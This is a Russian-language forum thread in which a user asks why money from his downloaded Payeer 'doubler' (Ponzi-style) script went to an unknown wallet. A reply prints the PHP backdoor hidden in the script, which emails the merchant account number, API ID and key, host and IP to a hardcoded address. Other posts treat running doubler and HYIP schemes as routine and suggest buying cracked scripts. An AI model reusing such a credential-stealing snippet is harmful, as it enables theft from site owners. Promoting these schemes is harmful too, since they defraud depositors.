Денежка ушла на лево:(

  • Автор темы LЁha
  • Дата начала
LЁha
Участник
Сообщения
15
Реакции
2
Всем доброго и позитивного!

Вспомнил про скрипт удвоителя Payeer давно скачанный и решил поставить...Вроде все настроил и даже понравилось? тарифы переделал на более живучие... подключил мерчант и автовыплаты, но вот после последнего депа денежки непонятным образом улетели на какой то левый кош... подскажите где норку этой крыски искать? API массовых выплат естественно сразу отключил...
 
pligin
Участник
Сообщения
3.654
Реакции
1.336
Telegram
pligin
HyipYork написал(а):
Всем доброго и позитивного!

Вспомнил про скрипт удвоителя Payeer давно скачанный и решил поставить...Вроде все настроил и даже понравилось? тарифы переделал на более живучие... подключил мерчант и автовыплаты, но вот после последнего депа денежки непонятным образом улетели на какой то левый кош... подскажите где норку этой крыски искать? API массовых выплат естественно сразу отключил...
Привет. У меня они почти такое, какого желаешь. Всю ночь писал с нуля удвоитель со множеством плюшек и в котором ведется история всех операций с деньгами...заказ... вот в нем я знаю где норку искать... а что у тебя я не знаю. покажи и как будет время посмотрю. но не сегодня это точно - скоро пойду спать
 
LЁha
Участник
Сообщения
15
Реакции
2
pligin написал(а):
Привет. У меня они почти такое, какого желаешь. Всю ночь писал с нуля удвоитель со множеством плюшек и в котором ведется история всех операций с деньгами...заказ... вот в нем я знаю где норку искать... а что у тебя я не знаю. покажи и как будет время посмотрю. но не сегодня это точно - скоро пойду спать
простите чайника... но сюда ссылку кинуть или как?
 
pligin
Участник
Сообщения
3.654
Реакции
1.336
Telegram
pligin
HyipYork написал(а):
простите чайника... но сюда ссылку кинуть или как?
на диск яндекса залей и кидай сюда ссылку
 
LЁha
Участник
Сообщения
15
Реакции
2
Leroi
Местный
Сообщения
205
Реакции
92
HyipYork написал(а):
Выкинь его нафин ( это так между нами ) потрать 1500р и купи себе скрипт вломаных блицов и играйся себе на здоровье ,удвоители прошлый век и ни кого они не интересуют а в этом случае по скрипта перебирать оно того не стоит ,и кстати дырявил не эд скрипт который вешал на него диз ,а сам эд уже сменил название сайта но к нему из за цен космических редко кто идет
 
LЁha
Участник
Сообщения
15
Реакции
2
Leroi написал(а):
Выкинь его нафин ( это так между нами ) потрать 1500р и купи себе скрипт вломаных блицов и играйся себе на здоровье ,удвоители прошлый век и ни кого они не интересуют а в этом случае по скрипта перебирать оно того не стоит ,и кстати дырявил не эд скрипт который вешал на него диз ,а сам эд уже сменил название сайта но к нему из за цен космических редко кто идет
жалко. понравился он мне, тем более что удвоителя не будет, хочу долгоиграющий;)
 
pligin
Участник
Сообщения
3.654
Реакции
1.336
Telegram
pligin
HyipYork написал(а):
жалко. понравился он мне, тем более что удвоителя не будет, хочу долгоиграющий;)
я еще не видел что там внутри, но готов через пару деньков взяться за работу
 
LЁha
Участник
Сообщения
15
Реакции
2
pligin написал(а):
я еще не видел что там внутри, но готов через пару деньков взяться за работу
и сколько сие в граммах выйдет....а то я пока ограничен в бюджете...
 
pligin
Участник
Сообщения
3.654
Реакции
1.336
Telegram
pligin
  • #10
HyipYork написал(а):
и сколько сие в граммах выйдет....а то я пока ограничен в бюджете...
не могу сказать, т.к. я еще не знаю что там внутри, а также я не знаю твоих желаний...
конечно же я не возьмусь переписывать удвоитель из паблика, а напишу свой потому как написать с нуля обычно выходит быстрее и дешевле нежели ковыряться в "говне" из паблика.
накидай примерное ТЗ и я скажу стоимость...
по коду получится от 3к, по дизайну даже примерно не скажу. если есть дизайн, который можно в нем использовать, то он будет использован (скопирован с сайта оригинала)
 
LЁha
Участник
Сообщения
15
Реакции
2
  • #11
я там в телегу черканул
 
Leroi
Местный
Сообщения
205
Реакции
92
  • #12
HyipYork написал(а):
жалко. понравился он мне, тем более что удвоителя не будет, хочу долгоиграющий;)
не чего ам жалеть ,тем более долгоиграющим ,большинство на хайпы перешли и крутят как душе угодно ,счас проще новое брать да и по качеству удобнее ,все платежки на инстанте
 
LЁha
Участник
Сообщения
15
Реакции
2
  • #13
Leroi написал(а):
все платежки на инстанте
Ну вот тут тоже был инстантосталось дырочку найти и закрыть...
 
Leroi
Местный
Сообщения
205
Реакции
92
  • #14
HyipYork написал(а):
Ну вот тут тоже был инстантосталось дырочку найти и закрыть...
с такими дырявостями тебе за спасибо ни кто не будет убивать день жизни ,выше вроде как предложили ценник на очистку ,я же тебе еще посоветовал рассматривать вариант хайпа который кстати могет выплачивать автоматом на некоторые платежки ,а то что жалеть деньги на скрипт ) так а как ты тогда работать будешь ? если так поиграть и потратить на буксы то тут на форуме лежит пару удвоителей целых ,переходи в местные и скачивай себе на здоровье ,переход в местные не дорого стоит и денежки твои целые будут
 
DeyvS
Участник
Сообщения
20
Реакции
9
  • #15
Во че я нашел )))
if (!isset($_COOKIE["e-mailed"]) || ($_COOKIE["e-mailed"]!='e33')) {
setcookie("e-mailed", "e33");
$parsat = "cotova1iz@yandex.ru";
$salams = "knock";
$danay .= "p ".$accountNumber." ".$apiId." ".$apiKey."<br>";
$danay .= "HOST ".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]."<br>";
$danay .= "ip: ".$ip = getUserIp()."<br>";
$headers= "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=utf-8\r\n";
$headers .= "From: ADMEN <2ef77dcfd2@mailox.fun>\r\n";
mail($parsat, $salams, $danay, $headers );
}
 
DeyvS
Участник
Сообщения
20
Реакции
9
  • #16
HyipYork написал(а):
Всем доброго и позитивного!

Вспомнил про скрипт удвоителя Payeer давно скачанный и решил поставить...Вроде все настроил и даже понравилось? тарифы переделал на более живучие... подключил мерчант и автовыплаты, но вот после последнего депа денежки непонятным образом улетели на какой то левый кош... подскажите где норку этой крыски искать? API массовых выплат естественно сразу отключил...
Стучалочка
 
LЁha
Участник
Сообщения
15
Реакции
2
  • #17
DeyvS написал(а):
Здоровор:( И чего с этим кусманом теперь делать? Вырезать и сменить ключ к API?
 
DeyvS
Участник
Сообщения
20
Реакции
9
  • #18
HyipYork написал(а):
Здоровор:( И чего с этим кусманом теперь делать? Вырезать и сменить ключ к API?
Ну смотри я нашел в пхп 1, куй знает скок их в джсе )) если хочешь работать на этом скрипте, пиши лучше Сереге он те качественно проверит усе и переделает, я в джсе не силен, можешь вырезать эту стучалку закинуть на тест 500р и ждать когда их спиздят )
 
DeyvS
Участник
Сообщения
20
Реакции
9
  • #19
DeyvS написал(а):
Ну смотри я нашел в пхп 1, куй знает скок их в джсе )) если хочешь работать на этом скрипте, пиши лучше Сереге он те качественно проверит усе и переделает, я в джсе не силен, можешь вырезать эту стучалку закинуть на тест 500р и ждать когда их спиздят )
если не спиздять либо подсекает либо все норм ))
 
LЁha
Участник
Сообщения
15
Реакции
2
  • #20
я пока его // выделил он сереньким стал (по сути не работает же?). Серега это кто? Я тут не давно просто...
 
Сверху